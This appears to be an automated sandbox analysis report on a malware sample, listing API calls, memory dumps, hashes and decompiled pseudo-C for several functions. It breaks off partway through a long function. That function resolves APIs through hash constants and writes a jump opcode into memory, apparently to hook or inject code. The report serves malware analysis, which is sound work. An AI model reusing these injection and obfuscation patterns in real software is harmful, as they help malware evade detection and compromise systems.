0x709a1132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 709A1125

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: c119cd310ec5a145ea284fc52d913022987635cf2b75731d9cf8b702a6630de1
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: BDF049B4708246AFFB4595289D15F7F22EE5BC1614F51C82CBA81DA288EA78C945D322

Uniqueness

Uniqueness Score: -1.00%

Function 709A55B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E709A55B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E709A2F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E7099E6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x709a55c2
0x709a55c4
0x709a55cb
0x709a55cd
0x709a55d1
0x709a55d3
0x709a55d6
0x709a55d9
0x709a55d9
0x709a55f3
0x00000000
0x00000000
0x709a5604
0x709a5608
0x00000000
0x00000000
0x709a5616
0x709a5619
0x709a561e
0x709a5623
0x709a5623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 709A5604

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: e3ca4fd5b5b373e56d0d783108d03dd03a2c6d0524d997ca52a6045e1b8c1642
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: 22F0AFF66042097EE7259E1ADC44DBBBBEDEBC0B18F00841DB0D643200DA30AC10CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 709A5DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E709A5DF0(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E7099C33C(_t19) == 0) {
					_v12 = _a8;
					if(E709A2F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E709A352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x709a5df3
0x709a5df5
0x709a5e01
0x709a5e0b
0x709a5e21
0x709a5e40
0x709a5e23
0x709a5e34
0x709a5e38
0x709a5e58
0x709a5e3a
0x709a5e3a
0x709a5e3a
0x709a5e38
0x709a5e41
0x709a5e46
0x709a5e4f
0x709a5e48
0x709a5e48
0x709a5e4a
0x709a5e4a
0x709a5e03
0x709a5e03
0x709a5e03
0x709a5e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,709A5CE5,00000000,?,00000000,?), ref: 709A5E34

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: f1212e442cf48fe2338bc0b548d36573b80355db2484f29b84de1c7d38fb45ff
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: 46F031B1348616BEDB519B28CC40AAE77E9AB45150F30882DB89AD6144EA21EA04C623

Uniqueness

Uniqueness Score: -1.00%

Function 709A3564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E709A3564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x709ad228 == 0xcd845700) {
					_t8 = E709A2F8C(0xa5eabdf8, 0xd926c223);
					 *0x709ad22c = E709A2F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x709ad228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x709ad228 = 0;
					}
				}
				_t3 = E709A2F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x709ad228);
					asm("int3");
					return _t3;
				}
			}

0x709a356c
0x709a3574
0x709a35a7
0x709a35b8
0x709a35c3
0x709a35ce
0x709a35d0
0x709a35d0
0x709a35c3
0x709a3580
0x709a3587
0x709a3597
0x709a3589
0x709a3589
0x709a358a
0x709a358c
0x709a358e
0x709a358f
0x709a358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,7099DEB9,?,?), ref: 709A35CE

Memory Dump Source

Source File: 00000002.00000002.591905429.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true

Associated: 00000002.00000002.591883788.0000000070990000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591928200.00000000709AA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.591939031.00000000709AD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.591965411.00000000709AF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: dd281737f3bbe2c98f27fc5966b802d41d0c0d0f1f58227429a17bdb8235f32c
Instruction ID: 673d195e621ed8b1f991ca5419f46a6479b50558d4e44d8915623182e928c9e3
Opcode Fuzzy Hash: dd281737f3bbe2c98f27fc5966b802d41d0c0d0f1f58227429a17bdb8235f32c
Instruction Fuzzy Hash: 50F0AEF3A08111BDD3511B7EAC04F5EBEECEFC5516BA0C83CB555BA040DE144840D623

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 70999144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E70999144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E709A2F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E7099F620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E7099F620( &_v472, 0);
				_v528 = 0;
				E7099F620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E7099F8C4( &_v528, E7099F568( &_v528) + 0x10);
				E7099F558( &_v532, E7099F568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E7099F8C4( &_v536, E7099F568( &_v536) + 0x10);
				E7099F558( &_v540, E7099F568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E7099F8C4( &_v544, E7099F568( &_v544) + 0x10);
				E7099F558( &_v548, E7099F568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E7099F8C4( &_v552, E7099F568( &_v552) + 0x10);
				E7099F558( &_v556, E7099F568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E7099F8C4( &_v560, E7099F568( &_v560) + 0x10);
				E7099F558( &_v564, E7099F568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E7099F8C4( &_v568, E7099F568( &_v568) + 0x10);
				E7099F558( &_v572, E7099F568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E709A413C(0xa5eabdf8, _t953);
				E7099F558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E7099F558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E7099F558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E7099F558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E7099F558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E7099F558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E7099ADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E7099B338( &_v308, _t951, __eflags, _t889, _t931);
					E7099F8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v516, E7099F568( &_v516) + 0x10);
					E7099F558( &_v520, E7099F568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v524, E7099F568( &_v524) + 0x10);
					E7099F558( &_v528, E7099F568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v532, E7099F568( &_v532) + 0x10);
					E7099F558( &_v536, E7099F568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E7099BAB8( &_v340, __eflags);
					E7099F558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E7099F558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E7099F558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E7099F620( &_v396, 0);
					E7099F620( &_v416, 0);
					_push(0);
					_push( *0x709ab7c4);
					E709A20A4(__eflags,  &_v100);
					E7099F75C( &_v416, __eflags);
					E7099E054( &_v100);
					E7099F8C4( &_v436, E7099F744( &_v420,  &_v100));
					_t437 = E7099F558( &_v424, 0);
					E70997970(_t951, _t437, E7099F558( &_v444, 0), _v112);
					_t442 = E7099F568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E7099B0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E7099B0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E7099F6F0( &_v380);
						E7099F6F0( &_v364);
						E7099F6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E709A35D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E7099CDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E7099B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E7099F568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E7099F568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E709A3C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E7099F8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v564, E7099F568( &_v564) + 0x10);
					E7099F558( &_v568, E7099F568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v572, E7099F568( &_v572) + 0x10);
					E7099F558( &_v576, E7099F568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v580, E7099F568( &_v580) + 0x10);
					E7099F558( &_v584, E7099F568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v588, E7099F568( &_v588) + 0x10);
					E7099F558( &_v592, E7099F568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v596, E7099F568( &_v596) + 0x10);
					E7099F558( &_v600, E7099F568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v604, E7099F568( &_v604) + 0x10);
					E7099F558( &_v608, E7099F568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v612, E7099F568( &_v612) + 0x10);
					E7099F558( &_v616, E7099F568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E7099F8C4( &_v620, E7099F568( &_v620) + 0x10);
					E7099F558( &_v624, E7099F568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E709A413C(0xa5eabdf8, _t857);
					E7099F558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E7099F558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E7099F558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E7099F558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E7099F558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E7099F558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E7099F558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E7099F558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E7099A5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E7099B608(_t955 + 0xbc);
						E7099CDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E7099AD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E7099A5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E7099A298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E7099A5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E709A3BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E7099AD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E7099A5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E7099F558( &_v404, 0);
							_push(E7099F568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E7099A298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E7099A5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E709A3BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E7099F620( &_v208, 0);
						_v100 = 0xe9;
						E7099F578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E7099F578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x709ab798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E709A3BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E7099F558( &_v208, 0);
							_push(E7099F568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E7099A298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E7099A5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E7099F6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E7099AD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E7099A5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
